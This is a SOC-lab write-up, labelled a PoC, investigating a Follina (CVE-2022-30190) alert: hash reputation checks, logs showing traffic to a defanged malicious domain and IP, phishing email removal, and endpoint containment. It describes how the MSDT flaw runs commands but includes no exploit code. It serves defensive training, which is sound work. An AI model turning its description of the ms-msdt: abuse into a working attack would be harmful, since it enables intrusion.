CVE-2022-30190 PoC — Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability

Source

Associated Vulnerability

Description

We are presented with a security alert indicating the detection of the Follina (CVE-2022-30190) vulnerability. A malicious Word document triggered msdt.exe execution, suggesting possible remote code execution on the host JonasPRD. Our task is to investigate the alert, confirm exploitation, assess impact, and recommend remediation.

Readme

# LetsDefend-SOC173-Follina-0-Day-Detected
We are presented with a security alert indicating the detection of the Follina (CVE-2022-30190) vulnerability. A malicious Word document triggered msdt.exe execution, suggesting possible remote code execution on the host JonasPRD. Our task is to investigate the alert, confirm exploitation, assess impact, and recommend remediation.



## Case details

<br />
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/3016fe04-0df7-4f3b-af1f-71f64bb0eaac" />

<br />
<br />

At 15:22 on 2nd June 2022, a security alert was raised, triggered by the **SOC173 - Follina 0-Day Detected SIEM rule**. The alert related to the endpoint named 'JonasPRD', with the IP address 172.16.17.39. It was identified that msdt.exe was executed following the opening of an Office document on this host. The alert provided details of the file, including its hash, and indicated that the antivirus marked the action as allowed, meaning the file was neither blocked nor quarantined.

Follina (CVE-2022-30190) is a Windows vulnerability that abuses the MSDT diagnostic tool: a crafted Office document can call the ms-msdt: protocol to launch msdt.exe and execute arbitrary commands on a machine without authentication. It can be triggered simply by opening or sometimes previewing a malicious Word file, allowing attackers to run programs, download additional malware, or exfiltrate data. Typical signs include unexpected msdt.exe processes, strange outbound connections, or new files/services appearing after a document was opened. Patch systems, avoid opening untrusted Office files, disable document preview where possible, and hunt for the document hash and msdt.exe activity to detect compromise.


## VirusTotal, OTX AlienVault & MalwareBazaar

To begin my investigation, I used VirusTotal to analyse the file hash. The results showed that 47 out of 67 vendors identified the file as malicious, with several reports linking it to CVE-2022-30190.

<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/bf05e888-b266-403e-bb86-c83f3c281fdb" />

Additionally, OTX assigns the file a high risk score of 9.2, categorising it as malicious.

<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/0a2ad72e-0ec0-456b-ae99-dfd8e72dfaec" />

A search on MalwareBazaar confirms that this file is present in their malware repository. Notably, the tags indicate it is associated with CVE-2022-30190, follina, maldoc, and msdt.exe.

<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/32940cae-0bf9-4a60-b7bd-c73fb09441e5" />
<br />
<br />

Upon conducting an analysis of the file hash using multiple sources, I can confirm that it is associated with CVE-2022-30190. According to the referenced threat intelligence, this hash corresponds to a malicious document.

## Log Analysis

By isolating the IP address of the affected endpoint, I identified seven log entries that align with the incident’s timeframe. Six of those entries show outbound requests to the flagged domain “www[.]xmlformats[.]com.”. 

<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/ed9f1339-3af9-422b-90af-07217b456f96" />
<br />
<br />

I also traced the network traffic to its destination IP address(141.105.65.149), confirming the connection.



<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/6e214016-590c-4aaa-b922-aa8064a34eb9" />


## Email Security

To validate my findings, I also examined the email received by the host. It contained a malicious document, clearly crafted as part of a phishing attempt. I took immediate action to mitigate the threat by removing it from the endpoint.



<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/3377ad45-7f03-4722-8b72-3ad089963d13" />


## Endpoint Security

After thoroughly investigating the affected endpoint, I decided to contain the device to prevent further damage. During the review, I discovered the presence of the msdt.exe process, which further confirmed the need for isolation and escalation to Level 2 for deeper analysis.



<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/f9bae79e-e459-49af-9075-070568570c9f" />


## Conclusion 

Evidence shows a confirmed compromise via CVE-2022-30190 (Follina) delivered in a phishing email. The user opened and ran the malicious Word document. Analysis of logs and the file found connections to the embedded C2 IP and execution of attacker commands on the device. The incident is being escalated to a T2 SOC analyst and the endpoint will be isolated to contain the threat and protect the organisation.



<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/4b4a6996-8dce-4b85-b6b4-56dc9b50a924" />
<br />
<br />

Thank you for reading!

File Snapshot

 [4.0K]  /data/pocs/dc45bae5c9bdbeee2030984a7c06274c2aed8f5a
└── [4.9K]  README.md

1 directory, 1 file

Remarks